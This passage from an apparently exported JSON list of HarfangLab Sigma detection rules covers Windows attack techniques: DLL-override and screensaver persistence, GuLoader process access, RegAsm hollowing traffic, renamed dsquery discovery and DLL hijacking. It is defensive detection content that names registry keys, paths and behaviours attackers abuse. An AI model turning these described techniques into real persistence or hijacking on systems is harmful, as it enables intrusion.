"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5d54d0e8-81b2-43b4-bf1e-c57b6384b805",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078618Z",
"creation_date": "2026-03-23T11:45:34.078620Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078625Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://persistence-info.github.io/Data/naturallanguage6.html",
"https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/",
"https://attack.mitre.org/techniques/T1546/"
],
"name": "t1546_persistence_natural_language_dll_override.yml",
"content": "title: Possible Persistence Added via Natural Language 6 DLL Override\nid: 5d54d0e8-81b2-43b4-bf1e-c57b6384b805\ndescription: |\n Detects a modification of the DLL override registry key regarding the natural language 6 configuration in the Windows registry.\n This method is used as a means to achieve persistence by setting the key to a malicious DLL, allowing execution through SearchIndexer.exe.\n It is recommended to investigate the process that modified the registry and to analyze the DLL pointed to by the registry value to look for suspicious content.\nreferences:\n - https://persistence-info.github.io/Data/naturallanguage6.html\n - https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/\n - https://attack.mitre.org/techniques/T1546/\ndate: 2022/07/20\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|startswith: 'HKLM\\System\\CurrentControlSet\\Control\\ContentIndex\\Language\\'\n TargetObject|endswith:\n - '\\StemmerDLLPathOverride'\n - '\\WBDLLPathOverride'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5d54d0e8-81b2-43b4-bf1e-c57b6384b805",
"rule_name": "Possible Persistence Added via Natural Language 6 DLL Override",
"rule_description": "Detects a modification of the DLL override registry key regarding the natural language 6 configuration in the Windows registry.\nThis method is used as a means to achieve persistence by setting the key to a malicious DLL, allowing execution through SearchIndexer.exe.\nIt is recommended to investigate the process that modified the registry and to analyze the DLL pointed to by the registry value to look for suspicious content.\n",
"rule_creation_date": "2022-07-20",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5d565065-8f0b-4339-9f87-c2c74b742414",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595468Z",
"creation_date": "2026-03-23T11:45:34.595472Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595479Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/software/S0561/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_guloader_process_access.yml",
"content": "title: Possible GuLoader Process Access\nid: 5d565065-8f0b-4339-9f87-c2c74b742414\ndescription: |\n Detects suspicious process accesses associated with a GuLoader-specific, NSIS installer-related DLL.\n GuLoader is a small NSIS installer downloader used to download RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive.\n It is recommended to analyze the binary making the process access to look for malicious contents and determine its legitimacy.\nreferences:\n - https://attack.mitre.org/software/S0561/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/04/18\nmodified: 2025/05/26\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1055\n - attack.command_and_control\n - attack.t1071.001\n - attack.t1566.002\n - attack.execution\n - attack.t1106\n - attack.t1204.001\n - attack.t1204.002\n - attack.s0561\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Malware.GuLoader\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n GrantedAccess: '0x1FFFFF'\n CallTrace|contains: '|?:\\Users\\\\*\\AppData\\Local\\Temp\\ns?????.tmp\\System.dll+*'\n\n exclusion_firefox:\n TargetProcessImage|endswith: '\\firefox.exe'\n\n exclusion_plex:\n ProcessGrandparentImage: '?:\\Program Files\\Plex\\Plex\\Plex.exe'\n\n exclusion_legitimate_signers:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'McAfee, LLC'\n - 'Cyberlink Corp.'\n - '3dhistech Kft.'\n - 'Driver Support'\n - 'Open Source Developer, Ryosuke Asano'\n - 'PQ Labs Inc'\n - 'Tim Kosse' # FileZilla\n - 'Plex, Inc.'\n - 'Mozilla Corporation'\n\n exclusion_sogou:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\ns*.tmp\\setup_new.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Beijing Sogou Technology Development Co., Ltd.'\n\n 
exclusion_zeninstaller:\n - ProcessParentImage|endswith: '\\zen.installer.exe'\n ProcessDescription:\n - 'Zen Installer'\n - 'Zen Browser Installer'\n TargetProcessImage: '?:\\Program Files\\Zen Browser\\zen.exe'\n - ProcessCommandLine: '.\\setup.exe'\n ProcessParentImage|endswith: '\\zen.installer.exe'\n TargetProcessImage|endswith: '\\zen.exe'\n\n exclusion_commandline:\n ProcessCommandLine|contains:\n - '\\Au_.exe _?=?:\\Program Files\\'\n - '\\Au_.exe _?=?:\\Program Files (x86)\\'\n - '\\Un_A.exe _?=?:\\Program Files\\'\n - '\\Un_A.exe _?=?:\\Program Files (x86)\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5d565065-8f0b-4339-9f87-c2c74b742414",
"rule_name": "Possible GuLoader Process Access",
"rule_description": "Detects suspicious process accesses associated with a GuLoader-specific, NSIS installer-related DLL.\nGuLoader is a small NSIS installer downloader used to download RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive.\nIt is recommended to analyze the binary making the process access to look for malicious contents and determine its legitimacy.\n",
"rule_creation_date": "2024-04-18",
"rule_modified_date": "2025-05-26",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055",
"attack.t1071.001",
"attack.t1106",
"attack.t1204.001",
"attack.t1204.002",
"attack.t1566.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5d9c9ce0-2415-4246-acc7-bcf7ab1e7f03",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085796Z",
"creation_date": "2026-03-23T11:45:34.085798Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085803Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/",
"https://attack.mitre.org/techniques/T1055/012/",
"https://attack.mitre.org/techniques/T1571/"
],
"name": "t1055_012_regasm_suspicious_network_communication.yml",
"content": "title: Suspicious RegAsm.exe Network Communication\nid: 5d9c9ce0-2415-4246-acc7-bcf7ab1e7f03\ndescription: |\n Detects network communications via a non standard port from RegAsm.exe.\n Adversaries can use RegAsm.exe as a hollowed process and inject malicious code into it to evade process-based defenses.\n It is recommended to investigate the parent process performing this action and the destination IP address to determine the legitimacy of this behavior.\nreferences:\n - https://www.sentinelone.com/labs/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/\n - https://attack.mitre.org/techniques/T1055/012/\n - https://attack.mitre.org/techniques/T1571/\ndate: 2023/09/29\nmodified: 2025/05/26\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055.012\n - attack.command_and_control\n - attack.t1571\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: network_connection\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\RegAsm.exe'\n - ProcessOriginalFileName: 'RegAsm.exe'\n\n filter_http:\n DestinationPort: '80'\n\n exclusion_programfiles:\n ProcessCommandLine|contains:\n - '\\regasm.exe ?:\\Program Files\\'\n - '\\regasm.exe ?:\\Program Files (x86)\\'\n\n exclusion_schneider:\n ProcessCommandLine|endswith:\n - '\\RegAsm.exe /codebase ?:\\Program Files\\Common Files\\Schneider Electric Shared\\\\*\\\\*\\ZephyrDtm.Kernel.dll'\n - '\\RegAsm.exe /codebase ?:\\Program Files (x86)\\Common Files\\Schneider Electric Shared\\\\*\\\\*\\ZephyrDtm.Kernel.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5d9c9ce0-2415-4246-acc7-bcf7ab1e7f03",
"rule_name": "Suspicious RegAsm.exe Network Communication",
"rule_description": "Detects network communications via a non standard port from RegAsm.exe.\nAdversaries can use RegAsm.exe as a hollowed process and inject malicious code into it to evade process-based defenses.\nIt is recommended to investigate the parent process performing this action and the destination IP address to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2023-09-29",
"rule_modified_date": "2025-05-26",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055.012",
"attack.t1571"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5db05080-c59d-44b1-8530-0b311ce322d2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073993Z",
"creation_date": "2026-03-23T11:45:34.073995Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073999Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2019/10/09/persistence-screensaver/",
"https://attack.mitre.org/techniques/T1546/002/"
],
"name": "t1546_002_suspicious_screensaver_execution.yml",
"content": "title: Suspicious Execution Related to Screensaver\nid: 5db05080-c59d-44b1-8530-0b311ce322d2\ndescription: |\n Detects the execution of a suspicious .scr file, a Portable Executable (PE) file related to the Windows screensaver application.\n Usually, this type of file is located in 'C:\\Windows\\System32\\' or 'C:\\Windows\\SysWOW64\\' and this program is executed after a configurable time of user inactivity.\n Attackers can establish persistence via a modification of the registry 'HKCU\\Control Panel\\Desktop\\SCRNSAVE.exe' key.\n It is recommended to perform a static analysis of the .scr file to check its legitimacy.\nreferences:\n - https://pentestlab.blog/2019/10/09/persistence-screensaver/\n - https://attack.mitre.org/techniques/T1546/002/\ndate: 2022/02/15\nmodified: 2025/05/12\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1546.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessProcessName|endswith: '.scr'\n CommandLine|startswith: '?:\\'\n ParentImage:\n - '?:\\Windows\\System32\\winlogon.exe'\n - '?:\\Windows\\SysWOW64\\winlogon.exe'\n\n filter_system:\n CommandLine|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n\n exclusion_netpresenter:\n ProcessProcessName:\n - 'NETPRE~1.SCR'\n - 'Netpresenter.scr'\n ProcessSigned: 'true'\n ProcessSignature: 'Netpresenter B.V.'\n\n exclusion_netpresenter_unsigned:\n ProcessProcessName:\n - 'NETPRE~1.SCR'\n - 'Netpresenter.scr'\n ProcessSha256: 'f0e9a4bf3a12e67afedb714909c009453ba326414ebf3b3d6ae63375144335fd'\n\n exclusion_maincare:\n ProcessCompany: 'Maincare Solutions'\n ProcessProduct: 'M-CrossWay'\n ProcessInternalName: 'ScreenSaver.exe'\n\n exclusion_asus_oled_care:\n ProcessProcessName: 'OLED Care Screensaver.scr'\n ProcessSigned: 
'true'\n ProcessSignature: 'ASUSTeK COMPUTER INC.'\n\n exclusion_wlx_photo_gallery:\n ProcessProcessName: 'WLXPGSS.SCR'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_ivanti:\n ProcessImage: '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pwrsaver.scr'\n ProcessSigned: 'true'\n ProcessSignature: 'Ivanti, Inc.'\n\n exclusion_ribbons:\n ProcessOriginalFileName: 'Ribbons'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n exclusion_known_fp:\n ProcessSha256:\n # earth.Scr\n - 'ccdeb6da84164241cc30cbb36d21d9a152b5b1b0e1a067ad1d18665b413cae0b'\n # Fliqlo.scr\n - '2e0a46b385f21c081f69c940bf850656538a43dd8a1860093b88737f4ff82f8d'\n # Lively.Screensaver.dll\n - '7bc1378daf1ce8fad87055f87be8dd50d82755e11bf1744acc2987005370ab4d'\n # System47.scr\n - '6e773909911aadef994984b399d833f0796295e7085984c2fb6f42e09afa7a05'\n # matrix.scr\n - '18973bf33a9ec9ed53dd30b634aec0a4e30af66f3fcba9e2e0df6d47d2f83b6d'\n # Lagoon32.scr\n - '4abcd75331d262de96fe4b96c40bae8c8f0f07e33238498c88cd8540c932b09a'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5db05080-c59d-44b1-8530-0b311ce322d2",
"rule_name": "Suspicious Execution Related to Screensaver",
"rule_description": "Detects the execution of a suspicious .scr file, a Portable Executable (PE) file related to the Windows screensaver application.\nUsually, this type of file is located in 'C:\\Windows\\System32\\' or 'C:\\Windows\\SysWOW64\\' and this program is executed after a configurable time of user inactivity.\nAttackers can establish persistence via a modification of the registry 'HKCU\\Control Panel\\Desktop\\SCRNSAVE.exe' key.\nIt is recommended to perform a static analysis of the .scr file to check its legitimacy.\n",
"rule_creation_date": "2022-02-15",
"rule_modified_date": "2025-05-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1546.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5dbcadc4-da72-48c9-a11b-ab50099649cb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070393Z",
"creation_date": "2026-03-23T11:45:34.070395Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070399Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1036_005_execution_from_music_folder.yml",
"content": "title: Execution from Music Folder\nid: 5dbcadc4-da72-48c9-a11b-ab50099649cb\ndescription: |\n Detects a suspicious execution from the Music folder.\n Attackers may try to use the Music folder to hold their tools or malware because it is an uncommon directory that will often not be seen by users.\n It is recommended to analyze the parent and child processes to look for malicious content or actions.\nreferences:\n - https://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2023/03/13\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|startswith: '?:\\Users\\\\*\\Music\\'\n\n exclusion_musicbee:\n Image|endswith: '\\MusicBee\\MusicBee.exe'\n Company: 'Steven Mayall'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\n# level: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5dbcadc4-da72-48c9-a11b-ab50099649cb",
"rule_name": "Execution from Music Folder",
"rule_description": "Detects a suspicious execution from the Music folder.\nAttackers may try to use the Music folder to hold their tools or malware because it is an uncommon directory that will often not be seen by users.\nIt is recommended to analyze the parent and child processes to look for malicious content or actions.\n",
"rule_creation_date": "2023-03-13",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5dc806ff-858d-4f1c-914c-39992ff6162f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605464Z",
"creation_date": "2026-03-23T11:45:34.605468Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605475Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc732952(v=ws.11)?redirectedfrom=MSDN",
"https://www.mandiant.com/resources/blog/apt41-us-state-governments",
"https://thedfirreport.com/2021/05/12/conti-ransomware/",
"https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb",
"https://attack.mitre.org/techniques/T1087/002/",
"https://attack.mitre.org/techniques/T1482/",
"https://attack.mitre.org/techniques/T1069/002/",
"https://attack.mitre.org/software/S0105/"
],
"name": "t1087_002_dsquery_renamed.yml",
"content": "title: Suspicious Renamed or Moved Dsquery Tool Executed\nid: 5dc806ff-858d-4f1c-914c-39992ff6162f\ndescription: |\n Detects the execution of the renamed Dsquery tool which is a command-line tool that may be present on some Windows Servers.\n Dsquery is a legitimate Windows binary that can be used to query an Active Directory to gather information.\n This tool is often used by attackers during the discovery phase.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc732952(v=ws.11)?redirectedfrom=MSDN\n - https://www.mandiant.com/resources/blog/apt41-us-state-governments\n - https://thedfirreport.com/2021/05/12/conti-ransomware/\n - https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb\n - https://attack.mitre.org/techniques/T1087/002/\n - https://attack.mitre.org/techniques/T1482/\n - https://attack.mitre.org/techniques/T1069/002/\n - https://attack.mitre.org/software/S0105/\ndate: 2022/08/26\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.002\n - attack.t1482\n - attack.t1069.002\n - attack.defense_evasion\n - attack.t1036.003\n - attack.s0105\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Dsquery\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'dsquery.exe'\n\n filter_name:\n Image|endswith: '\\dsquery.exe'\n\n filter_path:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5dc806ff-858d-4f1c-914c-39992ff6162f",
"rule_name": "Suspicious Renamed or Moved Dsquery Tool Executed",
"rule_description": "Detects the execution of the renamed Dsquery tool which is a command-line tool that may be present on some Windows Servers.\nDsquery is a legitimate Windows binary that can be used to query an Active Directory to gather information.\nThis tool is often used by attackers during the discovery phase.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-08-26",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1036.003",
"attack.t1069.002",
"attack.t1087.002",
"attack.t1482"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5e396487-729d-4967-a04b-00d5f7fd4ddd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592456Z",
"creation_date": "2026-03-23T11:45:34.592460Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592467Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bitlockerwizardelev.yml",
"content": "title: DLL Hijacking via BitLockerWizardElev.exe\nid: 5e396487-729d-4967-a04b-00d5f7fd4ddd\ndescription: |\n Detects potential Windows DLL Hijacking via BitLockerWizardElev.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'BitLockerWizardElev.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\fvewiz.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5e396487-729d-4967-a04b-00d5f7fd4ddd",
"rule_name": "DLL Hijacking via BitLockerWizardElev.exe",
"rule_description": "Detects potential Windows DLL Hijacking via BitLockerWizardElev.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5e3aa973-aa80-4aab-bd67-4ab462e4221c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607372Z",
"creation_date": "2026-03-23T11:45:34.607375Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607382Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
